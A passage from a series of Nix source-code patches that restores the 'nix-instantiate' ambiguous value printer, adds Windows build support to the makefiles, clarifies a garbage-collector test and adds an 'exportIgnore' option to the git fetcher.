4); + vList.bigList.elems[0] = &vOne; + vList.bigList.elems[1] = &vTwo; + vList.bigList.size = 2; + + test(vList, + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT " «1 item elided»" ANSI_NORMAL "]", + PrintOptions { + .ansiColors = true, + .maxListItems = 1 + }); + + Value vThree; + vThree.mkInt(3); + + vList.bigList.elems[2] = &vThree; + vList.bigList.size = 3; + + test(vList, + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT " «2 items elided»" ANSI_NORMAL "]", + PrintOptions { + .ansiColors = true, + .maxListItems = 1 + }); } } // namespace nix From df84dd4d8dd3fd6381ac2ca3064432ab31a16b79 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Tue, 9 Jan 2024 11:13:45 -0800 Subject: [PATCH 220/654] Restore ambiguous value printer for `nix-instantiate` The Nix team has requested that this output format remain unchanged. I've added a warning to the man page explaining that `nix-instantiate --eval` output will not parse correctly in many situations. --- doc/manual/src/command-ref/nix-instantiate.md | 80 ++++++++++---- src/libexpr/print-ambiguous.cc | 100 ++++++++++++++++++ src/libexpr/print-ambiguous.hh | 24 +++++ src/nix-env/user-env.cc | 3 +- src/nix-instantiate/nix-instantiate.cc | 6 +- tests/functional/lang/eval-okay-print.exp | 2 +- 6 files changed, 189 insertions(+), 26 deletions(-) create mode 100644 src/libexpr/print-ambiguous.cc create mode 100644 src/libexpr/print-ambiguous.hh diff --git a/doc/manual/src/command-ref/nix-instantiate.md b/doc/manual/src/command-ref/nix-instantiate.md index e1b4a3e80..483150aa8 100644 --- a/doc/manual/src/command-ref/nix-instantiate.md +++ b/doc/manual/src/command-ref/nix-instantiate.md @@ -35,13 +35,50 @@ standard input. - `--parse`\ Just parse the input files, and print their abstract syntax trees on - standard output in ATerm format. + standard output as a Nix expression. - `--eval`\ Just parse and evaluate the input files, and print the resulting values on standard output. No instantiation of store derivations takes place. + > **Warning** + > + > This option produces ambiguous output which is not suitable for machine + > consumption. For example, these two Nix expressions print the same result + > despite having different types: + > + > ```console + > $ nix-instantiate --eval --expr '{ a = {}; }' + > { a = ; } + > $ nix-instantiate --eval --expr '{ a = ; }' + > { a = ; } + > ``` + > + > For human-readable output, `nix eval` (experimental) is more informative: + > + > ```console + > $ nix-instantiate --eval --expr 'a: a' + > + > $ nix eval --expr 'a: a' + > «lambda @ «string»:1:1» + > ``` + > + > For machine-readable output, the `--xml` option produces unambiguous + > output: + > + > ```console + > $ nix-instantiate --eval --xml --expr '{ foo = ; }' + > + > + > + > + > + > + > + > + > ``` + - `--find-file`\ Look up the given files in Nix’s search path (as specified by the `NIX_PATH` environment variable). If found, print the corresponding @@ -61,11 +98,11 @@ standard input. - `--json`\ When used with `--eval`, print the resulting value as an JSON - representation of the abstract syntax tree rather than as an ATerm. + representation of the abstract syntax tree rather than as a Nix expression. - `--xml`\ When used with `--eval`, print the resulting value as an XML - representation of the abstract syntax tree rather than as an ATerm. + representation of the abstract syntax tree rather than as a Nix expression. The schema is the same as that used by the [`toXML` built-in](../language/builtins.md). @@ -133,28 +170,29 @@ $ nix-instantiate --eval --xml --expr '1 + 2' The difference between non-strict and strict evaluation: ```console -$ nix-instantiate --eval --xml --expr 'rec { x = "foo"; y = x; }' -... - - - - - - -... +$ nix-instantiate --eval --xml --expr '{ x = {}; }' + + + + + + + + ``` Note that `y` is left unevaluated (the XML representation doesn’t attempt to show non-normal forms). ```console -$ nix-instantiate --eval --xml --strict --expr 'rec { x = "foo"; y = x; }' -... - - - - - - -... +$ nix-instantiate --eval --xml --strict --expr '{ x = {}; }' + + + + + + + + + ``` diff --git a/src/libexpr/print-ambiguous.cc b/src/libexpr/print-ambiguous.cc new file mode 100644 index 000000000..07c398dd2 --- /dev/null +++ b/src/libexpr/print-ambiguous.cc @@ -0,0 +1,100 @@ +#include "print-ambiguous.hh" +#include "print.hh" +#include "signals.hh" + +namespace nix { + +// See: https://github.com/NixOS/nix/issues/9730 +void printAmbiguous( + Value &v, + const SymbolTable &symbols, + std::ostream &str, + std::set *seen, + int depth) +{ + checkInterrupt(); + + if (depth <= 0) { + str << "«too deep»"; + return; + } + switch (v.type()) { + case nInt: + str << v.integer; + break; + case nBool: + printLiteralBool(str, v.boolean); + break; + case nString: + printLiteralString(str, v.string_view()); + break; + case nPath: + str << v.path().to_string(); // !!! escaping? + break; + case nNull: + str << "null"; + break; + case nAttrs: { + if (seen && !v.attrs->empty() && !seen->insert(v.attrs).second) + str << "«repeated»"; + else { + str << "{ "; + for (auto & i : v.attrs->lexicographicOrder(symbols)) { + str << symbols[i->name] << " = "; + printAmbiguous(*i->value, symbols, str, seen, depth - 1); + str << "; "; + } + str << "}"; + } + break; + } + case nList: + if (seen && v.listSize() && !seen->insert(v.listElems()).second) + str << "«repeated»"; + else { + str << "[ "; + for (auto v2 : v.listItems()) { + if (v2) + printAmbiguous(*v2, symbols, str, seen, depth - 1); + else + str << "(nullptr)"; + str << " "; + } + str << "]"; + } + break; + case nThunk: + if (!v.isBlackhole()) { + str << ""; + } else { + // Although we know for sure that it's going to be an infinite recursion + // when this value is accessed _in the current context_, it's likely + // that the user will misinterpret a simpler «infinite recursion» output + // as a definitive statement about the value, while in fact it may be + // a valid value after `builtins.trace` and perhaps some other steps + // have completed. + str << "«potential infinite recursion»"; + } + break; + case nFunction: + if (v.isLambda()) { + str << ""; + } else if (v.isPrimOp()) { + str << ""; + } else if (v.isPrimOpApp()) { + str << ""; + } + break; + case nExternal: + str << *v.external; + break; + case nFloat: + str << v.fpoint; + break; + default: + printError("Nix evaluator internal error: printAmbiguous: invalid value type"); + abort(); + } +} + +} diff --git a/src/libexpr/print-ambiguous.hh b/src/libexpr/print-ambiguous.hh new file mode 100644 index 000000000..50c260a9b --- /dev/null +++ b/src/libexpr/print-ambiguous.hh @@ -0,0 +1,24 @@ +#pragma once + +#include "value.hh" + +namespace nix { + +/** + * Print a value in the deprecated format used by `nix-instantiate --eval` and + * `nix-env` (for manifests). + * + * This output can't be changed because it's part of the `nix-instantiate` API, + * but it produces ambiguous output; unevaluated thunks and lambdas (and a few + * other types) are printed as Nix path syntax like ``. + * + * See: https://github.com/NixOS/nix/issues/9730 + */ +void printAmbiguous( + Value &v, + const SymbolTable &symbols, + std::ostream &str, + std::set *seen, + int depth); + +} diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 3d07cab7a..973b6ee2b 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -108,8 +108,7 @@ bool createUserEnv(EvalState & state, DrvInfos & elems, environment. */ auto manifestFile = ({ std::ostringstream str; - std::set seen; - printAmbiguous(manifest, state.symbols, str, &seen, std::numeric_limits::max()); + printAmbiguous(manifest, state.symbols, str, nullptr, std::numeric_limits::max()); // TODO with C++20 we can use str.view() instead and avoid copy. std::string str2 = str.str(); StringSource source { str2 }; diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index 9b36dccc6..87bc986e8 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -1,9 +1,11 @@ #include "globals.hh" +#include "print-ambiguous.hh" #include "shared.hh" #include "eval.hh" #include "eval-inline.hh" #include "get-drvs.hh" #include "attr-path.hh" +#include "signals.hh" #include "value-to-xml.hh" #include "value-to-json.hh" #include "store-api.hh" @@ -24,7 +26,6 @@ static int rootNr = 0; enum OutputKind { okPlain, okXML, okJSON }; - void processExpr(EvalState & state, const Strings & attrPaths, bool parseOnly, bool strict, Bindings & autoArgs, bool evalOnly, OutputKind output, bool location, Expr * e) @@ -56,7 +57,8 @@ void processExpr(EvalState & state, const Strings & attrPaths, std::cout << std::endl; } else { if (strict) state.forceValueDeep(vRes); - vRes.print(state, std::cout); + std::set seen; + printAmbiguous(vRes, state.symbols, std::cout, &seen, std::numeric_limits::max()); std::cout << std::endl; } } else { diff --git a/tests/functional/lang/eval-okay-print.exp b/tests/functional/lang/eval-okay-print.exp index aa1b2379e..0d960fb70 100644 --- a/tests/functional/lang/eval-okay-print.exp +++ b/tests/functional/lang/eval-okay-print.exp @@ -1 +1 @@ -[ null «primop toString» «partially applied primop deepSeq» «lambda @ /pwd/lang/eval-okay-print.nix:1:61» [ [ «repeated» ] ] ] +[ null [ [ «repeated» ] ] ] From 34bb6dcab1334ebc6ac0afaf4fe6f9e6f13de4b5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 11:14:13 -0500 Subject: [PATCH 221/654] makefiles: Support `.exe` executable prefix on Windows --- mk/programs.mk | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/mk/programs.mk b/mk/programs.mk index 6235311e9..623caaf55 100644 --- a/mk/programs.mk +++ b/mk/programs.mk @@ -1,5 +1,11 @@ programs-list := +ifdef HOST_WINDOWS + EXE_EXT = .exe +else + EXE_EXT = +endif + # Build a program with symbolic name $(1). The program is defined by # various variables prefixed by ‘$(1)_’: # @@ -31,7 +37,7 @@ define build-program _srcs := $$(sort $$(foreach src, $$($(1)_SOURCES), $$(src))) $(1)_OBJS := $$(addprefix $(buildprefix), $$(addsuffix .o, $$(basename $$(_srcs)))) _libs := $$(foreach lib, $$($(1)_LIBS), $$(foreach lib2, $$($$(lib)_LIB_CLOSURE), $$($$(lib2)_PATH))) - $(1)_PATH := $$(_d)/$$($(1)_NAME) + $(1)_PATH := $$(_d)/$$($(1)_NAME)$(EXE_EXT) $$(eval $$(call create-dir, $$(_d))) @@ -42,7 +48,7 @@ define build-program ifdef $(1)_INSTALL_DIR - $(1)_INSTALL_PATH := $$($(1)_INSTALL_DIR)/$$($(1)_NAME) + $(1)_INSTALL_PATH := $$($(1)_INSTALL_DIR)/$$($(1)_NAME)$(EXE_EXT) $$(eval $$(call create-dir, $$($(1)_INSTALL_DIR))) From af0345df3688494d1e53a659eacb16fc4b9915b5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 11:14:13 -0500 Subject: [PATCH 222/654] makefiles: Do some HOST_CYGWIN -> HOST_WINDOWS These bits are not Cygwin-specific. --- mk/libraries.mk | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/mk/libraries.mk b/mk/libraries.mk index 515a481f6..b99ba2782 100644 --- a/mk/libraries.mk +++ b/mk/libraries.mk @@ -3,7 +3,7 @@ libs-list := ifdef HOST_DARWIN SO_EXT = dylib else - ifdef HOST_CYGWIN + ifdef HOST_WINDOWS SO_EXT = dll else SO_EXT = so @@ -65,7 +65,7 @@ define build-library $(1)_OBJS := $$(addprefix $(buildprefix), $$(addsuffix .o, $$(basename $$(_srcs)))) _libs := $$(foreach lib, $$($(1)_LIBS), $$($$(lib)_PATH)) - ifdef HOST_CYGWIN + ifdef HOST_WINDOWS $(1)_INSTALL_DIR ?= $$(bindir) else $(1)_INSTALL_DIR ?= $$(libdir) @@ -85,7 +85,7 @@ define build-library endif else ifndef HOST_DARWIN - ifndef HOST_CYGWIN + ifndef HOST_WINDOWS $(1)_LDFLAGS += -Wl,-z,defs endif endif From 90fdbfc601a8d005f57c984284c5922dc38480eb Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 9 Jan 2024 12:41:42 -0500 Subject: [PATCH 223/654] Build Windows DLLs with `-Wl,--export-all-symbols` This is not the most elegant, but will match the SOs in exporting everything for now. Later we can refine what is public/private to clean up the interface. --- Makefile | 37 ++++++++++++++++++++++++++++++++----- mk/lib.mk | 33 +-------------------------------- mk/platform.mk | 32 ++++++++++++++++++++++++++++++++ 3 files changed, 65 insertions(+), 37 deletions(-) create mode 100644 mk/platform.mk diff --git a/Makefile b/Makefile index 1fdb6e897..7bbfbddbe 100644 --- a/Makefile +++ b/Makefile @@ -1,8 +1,12 @@ +# External build directory support + include mk/build-dir.mk -include $(buildprefix)Makefile.config clean-files += $(buildprefix)Makefile.config +# List makefiles + ifeq ($(ENABLE_BUILD), yes) makefiles = \ mk/precompiled-headers.mk \ @@ -43,6 +47,8 @@ makefiles += \ tests/functional/plugins/local.mk endif +# Miscellaneous global Flags + OPTIMIZE = 1 ifeq ($(OPTIMIZE), 1) @@ -52,9 +58,29 @@ else GLOBAL_CXXFLAGS += -O0 -U_FORTIFY_SOURCE endif +include mk/platform.mk + +ifdef HOST_WINDOWS + # Windows DLLs are stricter about symbol visibility than Unix shared + # objects --- see https://gcc.gnu.org/wiki/Visibility for details. + # This is a temporary sledgehammer to export everything like on Unix, + # and not detail with this yet. + # + # TODO do not do this, and instead do fine-grained export annotations. + GLOBAL_LDFLAGS += -Wl,--export-all-symbols +endif + +GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src + +# Include the main lib, causing rules to be defined + include mk/lib.mk -# Must be included after `mk/lib.mk` so isn't the default target. +# Fallback stub rules for better UX when things are disabled +# +# These must be defined after `mk/lib.mk`. Otherwise the first rule +# incorrectly becomes the default target. + ifneq ($(ENABLE_UNIT_TESTS), yes) .PHONY: check check: @@ -69,8 +95,11 @@ installcheck: @exit 1 endif -# Must be included after `mk/lib.mk` so rules refer to variables defined -# by the library. Rules are not "lazy" like variables, unfortunately. +# Documentation or else fallback stub rules. +# +# The documentation makefiles be included after `mk/lib.mk` so rules +# refer to variables defined by `mk/lib.mk`. Rules are not "lazy" like +# variables, unfortunately. ifeq ($(ENABLE_DOC_GEN), yes) $(eval $(call include-sub-makefile, doc/manual/local.mk)) @@ -89,5 +118,3 @@ internal-api-html: @echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'." @exit 1 endif - -GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src diff --git a/mk/lib.mk b/mk/lib.mk index a5a067e48..10ce8d436 100644 --- a/mk/lib.mk +++ b/mk/lib.mk @@ -12,38 +12,7 @@ man-pages := install-tests := install-tests-groups := -ifdef HOST_OS - HOST_KERNEL = $(firstword $(subst -, ,$(HOST_OS))) - ifeq ($(patsubst mingw%,,$(HOST_KERNEL)),) - HOST_MINGW = 1 - HOST_WINDOWS = 1 - endif - ifeq ($(HOST_KERNEL), cygwin) - HOST_CYGWIN = 1 - HOST_WINDOWS = 1 - HOST_UNIX = 1 - endif - ifeq ($(patsubst darwin%,,$(HOST_KERNEL)),) - HOST_DARWIN = 1 - HOST_UNIX = 1 - endif - ifeq ($(patsubst freebsd%,,$(HOST_KERNEL)),) - HOST_FREEBSD = 1 - HOST_UNIX = 1 - endif - ifeq ($(patsubst netbsd%,,$(HOST_KERNEL)),) - HOST_NETBSD = 1 - HOST_UNIX = 1 - endif - ifeq ($(HOST_KERNEL), linux) - HOST_LINUX = 1 - HOST_UNIX = 1 - endif - ifeq ($(patsubst solaris%,,$(HOST_KERNEL)),) - HOST_SOLARIS = 1 - HOST_UNIX = 1 - endif -endif +include mk/platform.mk # Hack to define a literal space. space := diff --git a/mk/platform.mk b/mk/platform.mk new file mode 100644 index 000000000..fe960dedf --- /dev/null +++ b/mk/platform.mk @@ -0,0 +1,32 @@ +ifdef HOST_OS + HOST_KERNEL = $(firstword $(subst -, ,$(HOST_OS))) + ifeq ($(patsubst mingw%,,$(HOST_KERNEL)),) + HOST_MINGW = 1 + HOST_WINDOWS = 1 + endif + ifeq ($(HOST_KERNEL), cygwin) + HOST_CYGWIN = 1 + HOST_WINDOWS = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst darwin%,,$(HOST_KERNEL)),) + HOST_DARWIN = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst freebsd%,,$(HOST_KERNEL)),) + HOST_FREEBSD = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst netbsd%,,$(HOST_KERNEL)),) + HOST_NETBSD = 1 + HOST_UNIX = 1 + endif + ifeq ($(HOST_KERNEL), linux) + HOST_LINUX = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst solaris%,,$(HOST_KERNEL)),) + HOST_SOLARIS = 1 + HOST_UNIX = 1 + endif +endif From 3e237598342dee46188c83fba49cc30d509ee553 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 12 Jan 2024 12:38:55 +0100 Subject: [PATCH 224/654] gc-non-blocking.sh: Add explanation Also name the _NIX_TEST_GC_SYNC environment variables logically. --- src/libstore/gc.cc | 10 +++++----- tests/functional/gc-non-blocking.sh | 20 ++++++++++++++------ 2 files changed, 19 insertions(+), 11 deletions(-) diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index bd64e238d..80e036e7e 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -511,7 +511,7 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) /* Synchronisation point to test ENOENT handling in addTempRoot(), see tests/gc-non-blocking.sh. */ - if (auto p = getEnv("_NIX_TEST_GC_SYNC_2")) + if (auto p = getEnv("_NIX_TEST_GC_SYNC_1")) readFile(*p); /* Start the server for receiving new roots. */ @@ -637,6 +637,10 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) roots.insert(root.first); } + /* Synchronisation point for testing, see tests/functional/gc-non-blocking.sh. */ + if (auto p = getEnv("_NIX_TEST_GC_SYNC_2")) + readFile(*p); + /* Helper function that deletes a path from the store and throws GCLimitReached if we've deleted enough garbage. */ auto deleteFromStore = [&](std::string_view baseName) @@ -783,10 +787,6 @@ void LocalStore::collectGarbage(const GCOptions & options, GCResults & results) } }; - /* Synchronisation point for testing, see tests/functional/gc-non-blocking.sh. */ - if (auto p = getEnv("_NIX_TEST_GC_SYNC")) - readFile(*p); - /* Either delete all garbage paths, or just the specified paths (for gcDeleteSpecific). */ if (options.action == GCOptions::gcDeleteSpecific) { diff --git a/tests/functional/gc-non-blocking.sh b/tests/functional/gc-non-blocking.sh index 7f2aebb8b..ec280badb 100644 --- a/tests/functional/gc-non-blocking.sh +++ b/tests/functional/gc-non-blocking.sh @@ -6,10 +6,14 @@ needLocalStore "the GC test needs a synchronisation point" clearStore -fifo=$TEST_ROOT/test.fifo -mkfifo "$fifo" +# This FIFO is read just after the global GC lock has been acquired, +# but before the root server is started. +fifo1=$TEST_ROOT/test2.fifo +mkfifo "$fifo1" -fifo2=$TEST_ROOT/test2.fifo +# This FIFO is read just after the roots have been read, but before +# the actual GC starts. +fifo2=$TEST_ROOT/test.fifo mkfifo "$fifo2" dummy=$(nix store add-path ./simple.nix) @@ -17,19 +21,23 @@ dummy=$(nix store add-path ./simple.nix) running=$TEST_ROOT/running touch $running -(_NIX_TEST_GC_SYNC=$fifo _NIX_TEST_GC_SYNC_2=$fifo2 nix-store --gc -vvvvv; rm $running) & +# Start GC. +(_NIX_TEST_GC_SYNC_1=$fifo1 _NIX_TEST_GC_SYNC_2=$fifo2 nix-store --gc -vvvvv; rm $running) & pid=$! sleep 2 -(sleep 1; echo > $fifo2) & +# Delay the start of the root server to check that the build below +# correctly handles ENOENT when connecting to the root server. +(sleep 1; echo > $fifo1) & pid2=$! +# Start a build. This should not be blocked by the GC in progress. outPath=$(nix-build --max-silent-time 60 -o "$TEST_ROOT/result" -E " with import ./config.nix; mkDerivation { name = \"non-blocking\"; - buildCommand = \"set -x; test -e $running; mkdir \$out; echo > $fifo\"; + buildCommand = \"set -x; test -e $running; mkdir \$out; echo > $fifo2\"; }") wait $pid From 7c6f093abcb68a2d07cd6450672c120f33ab96d6 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 12 Jan 2024 13:00:53 +0100 Subject: [PATCH 225/654] .data() -> .c_str() to be on the safe side --- src/nix/develop.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 5e25833eb..1f2891378 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -603,7 +603,7 @@ struct CmdDevelop : Common, MixEnvironment setEnviron(); // prevent garbage collection until shell exits - setenv("NIX_GCROOT", gcroot.data(), 1); + setenv("NIX_GCROOT", gcroot.c_str(), 1); Path shell = "bash"; @@ -648,7 +648,7 @@ struct CmdDevelop : Common, MixEnvironment // Override SHELL with the one chosen for this environment. // This is to make sure the system shell doesn't leak into the build environment. - setenv("SHELL", shell.data(), 1); + setenv("SHELL", shell.c_str(), 1); // If running a phase or single command, don't want an interactive shell running after // Ctrl-C, so don't pass --rcfile From 4d0ecda33e29520756fdb7ccb7549205ed1afd52 Mon Sep 17 00:00:00 2001 From: DavHau Date: Sun, 19 Nov 2023 20:37:42 +0700 Subject: [PATCH 226/654] fetchTree/fetchGit: add test for .gitattributes ...with the intention to prevent future regressions in fetchGit --- tests/functional/fetchGit.sh | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh index 4985c7764..f0438f548 100644 --- a/tests/functional/fetchGit.sh +++ b/tests/functional/fetchGit.sh @@ -229,6 +229,15 @@ rev_tag2=$(git -C $repo rev-parse refs/tags/tag2) [[ $rev_tag2_nix = $rev_tag2 ]] unset _NIX_FORCE_HTTP +# Ensure .gitattributes is respected +touch $repo/not-exported-file +echo "/not-exported-file export-ignore" >> $repo/.gitattributes +git -C $repo add not-exported-file .gitattributes +git -C $repo commit -m 'Bla6' +rev5=$(git -C $repo rev-parse HEAD) +path12=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \"$rev5\"; }).outPath") +[[ ! -e $path12/not-exported-file ]] + # should fail if there is no repo rm -rf $repo/.git (! nix eval --impure --raw --expr "(builtins.fetchGit \"file://$repo\").outPath") From ce6d58a97cf6f975a0b930605605fab153445b22 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 27 Nov 2023 22:34:41 +0100 Subject: [PATCH 227/654] git fetcher: Add exportIgnore parameter Enabled for fetchGit, which historically had this behavior, among other behaviors we do not want in fetchGit. fetchTree disables this parameter by default. It can choose the simpler behavior, as it is still experimental. I am not confident that the filtering implementation is future proof. It should reuse a source filtering wrapper, which I believe Eelco has already written, but not merged yet. --- src/libexpr/primops/fetchTree.cc | 14 ++++++++ src/libfetchers/git-utils.cc | 57 +++++++++++++++++++++++++++----- src/libfetchers/git-utils.hh | 4 +-- src/libfetchers/git.cc | 15 +++++++-- tests/functional/fetchGit.sh | 5 ++- 5 files changed, 81 insertions(+), 14 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index eb2df8626..e00c4f190 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -39,6 +39,10 @@ void emitTreeAttrs( attrs.alloc("submodules").mkBool( fetchers::maybeGetBoolAttr(input.attrs, "submodules").value_or(false)); + if (input.getType() == "git") + attrs.alloc("exportIgnore").mkBool( + fetchers::maybeGetBoolAttr(input.attrs, "exportIgnore").value_or(false)); + if (!forceDirty) { if (auto rev = input.getRev()) { @@ -112,6 +116,11 @@ static void fetchTree( attrs.emplace("type", type.value()); + if (params.isFetchGit) { + // Default value; user attrs are assigned later. + attrs.emplace("exportIgnore", Explicit{true}); + } + for (auto & attr : *args[0]->attrs) { if (attr.name == state.sType) continue; state.forceValue(*attr.value, attr.pos); @@ -593,6 +602,11 @@ static RegisterPrimOp primop_fetchGit({ A Boolean parameter that specifies whether submodules should be checked out. + - `exportIgnore` (default: `true`) + + A Boolean parameter that specifies whether `export-ignore` from `.gitattributes` should be applied. + This approximates part of the `git archive` behavior. + - `shallow` (default: `false`) A Boolean parameter that specifies whether fetching from a shallow remote repository is allowed. diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 65f7b45ef..4dc749504 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -7,6 +7,7 @@ #include +#include #include #include #include @@ -21,6 +22,7 @@ #include #include +#include #include #include #include @@ -307,7 +309,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return std::nullopt; } - std::vector> getSubmodules(const Hash & rev) override; + std::vector> getSubmodules(const Hash & rev, bool exportIgnore) override; std::string resolveSubmoduleUrl( const std::string & url, @@ -340,7 +342,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return true; } - ref getAccessor(const Hash & rev) override; + ref getAccessor(const Hash & rev, bool exportIgnore) override; static int sidebandProgressCallback(const char * str, int len, void * payload) { @@ -460,10 +462,12 @@ struct GitInputAccessor : InputAccessor { ref repo; Tree root; + bool exportIgnore; - GitInputAccessor(ref repo_, const Hash & rev) + GitInputAccessor(ref repo_, const Hash & rev, bool exportIgnore) : repo(repo_) , root(peelObject(*repo, lookupObject(*repo, hashToOID(rev)).get(), GIT_OBJECT_TREE)) + , exportIgnore(exportIgnore) { } @@ -492,7 +496,7 @@ struct GitInputAccessor : InputAccessor return Stat { .type = tDirectory }; auto entry = lookup(path); - if (!entry) + if (!entry || isExportIgnored(path)) return std::nullopt; auto mode = git_tree_entry_filemode(entry); @@ -527,6 +531,12 @@ struct GitInputAccessor : InputAccessor for (size_t n = 0; n < count; ++n) { auto entry = git_tree_entry_byindex(tree.get(), n); + if (exportIgnore) { + if (isExportIgnored(path + git_tree_entry_name(entry))) { + continue; + } + } + // FIXME: add to cache res.emplace(std::string(git_tree_entry_name(entry)), DirEntry{}); } @@ -556,6 +566,33 @@ struct GitInputAccessor : InputAccessor std::unordered_map lookupCache; + bool isExportIgnored(const CanonPath & path) { + if (!exportIgnore) + return false; + + const char *exportIgnoreEntry = nullptr; + + // GIT_ATTR_CHECK_INDEX_ONLY: + // > It will use index only for creating archives or for a bare repo + // > (if an index has been specified for the bare repo). + // -- https://github.com/libgit2/libgit2/blob/HEAD/include/git2/attr.h#L113C62-L115C48 + if (git_attr_get(&exportIgnoreEntry, + *repo, + GIT_ATTR_CHECK_INDEX_ONLY, + std::string(path.rel()).c_str(), + "export-ignore")) { + if (git_error_last()->klass == GIT_ENOTFOUND) + return false; + else + throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); + } + else { + // Official git will silently reject export-ignore lines that have + // values. We do the same. + return GIT_ATTR_IS_TRUE(exportIgnoreEntry); + } + } + /* Recursively look up 'path' relative to the root. */ git_tree_entry * lookup(const CanonPath & path) { @@ -569,6 +606,10 @@ struct GitInputAccessor : InputAccessor throw Error("looking up '%s': %s", showPath(path), git_error_last()->message); } + if (entry && isExportIgnored(path)) { + entry.reset(); + } + i = lookupCache.emplace(path, std::move(entry)).first; } @@ -644,17 +685,17 @@ struct GitInputAccessor : InputAccessor } }; -ref GitRepoImpl::getAccessor(const Hash & rev) +ref GitRepoImpl::getAccessor(const Hash & rev, bool exportIgnore) { - return make_ref(ref(shared_from_this()), rev); + return make_ref(ref(shared_from_this()), rev, exportIgnore); } -std::vector> GitRepoImpl::getSubmodules(const Hash & rev) +std::vector> GitRepoImpl::getSubmodules(const Hash & rev, bool exportIgnore) { /* Read the .gitmodules files from this revision. */ CanonPath modulesFile(".gitmodules"); - auto accessor = getAccessor(rev); + auto accessor = getAccessor(rev, exportIgnore); if (!accessor->pathExists(modulesFile)) return {}; /* Parse it and get the revision of each submodule. */ diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh index 1def82071..f1cb48065 100644 --- a/src/libfetchers/git-utils.hh +++ b/src/libfetchers/git-utils.hh @@ -57,7 +57,7 @@ struct GitRepo * Return the submodules of this repo at the indicated revision, * along with the revision of each submodule. */ - virtual std::vector> getSubmodules(const Hash & rev) = 0; + virtual std::vector> getSubmodules(const Hash & rev, bool exportIgnore) = 0; virtual std::string resolveSubmoduleUrl( const std::string & url, @@ -71,7 +71,7 @@ struct GitRepo virtual bool hasObject(const Hash & oid) = 0; - virtual ref getAccessor(const Hash & rev) = 0; + virtual ref getAccessor(const Hash & rev, bool exportIgnore) = 0; virtual void fetch( const std::string & url, diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 79270c317..fb8bf5bf4 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -174,7 +174,7 @@ struct GitInputScheme : InputScheme for (auto & [name, value] : url.query) { if (name == "rev" || name == "ref" || name == "keytype" || name == "publicKey" || name == "publicKeys") attrs.emplace(name, value); - else if (name == "shallow" || name == "submodules" || name == "allRefs" || name == "verifyCommit") + else if (name == "shallow" || name == "submodules" || name == "exportIgnore" || name == "allRefs" || name == "verifyCommit") attrs.emplace(name, Explicit { value == "1" }); else url2.query.emplace(name, value); @@ -199,6 +199,7 @@ struct GitInputScheme : InputScheme "rev", "shallow", "submodules", + "exportIgnore", "lastModified", "revCount", "narHash", @@ -250,6 +251,8 @@ struct GitInputScheme : InputScheme url.query.insert_or_assign("shallow", "1"); if (getSubmodulesAttr(input)) url.query.insert_or_assign("submodules", "1"); + if (maybeGetBoolAttr(input.attrs, "exportIgnore").value_or(false)) + url.query.insert_or_assign("exportIgnore", "1"); if (maybeGetBoolAttr(input.attrs, "verifyCommit").value_or(false)) url.query.insert_or_assign("verifyCommit", "1"); auto publicKeys = getPublicKeys(input.attrs); @@ -372,6 +375,11 @@ struct GitInputScheme : InputScheme return maybeGetBoolAttr(input.attrs, "submodules").value_or(false); } + bool getExportIgnoreAttr(const Input & input) const + { + return maybeGetBoolAttr(input.attrs, "exportIgnore").value_or(false); + } + bool getAllRefsAttr(const Input & input) const { return maybeGetBoolAttr(input.attrs, "allRefs").value_or(false); @@ -600,7 +608,8 @@ struct GitInputScheme : InputScheme verifyCommit(input, repo); - auto accessor = repo->getAccessor(rev); + bool exportIgnore = getExportIgnoreAttr(input); + auto accessor = repo->getAccessor(rev, exportIgnore); accessor->setPathDisplay("«" + input.to_string() + "»"); @@ -610,7 +619,7 @@ struct GitInputScheme : InputScheme if (getSubmodulesAttr(input)) { 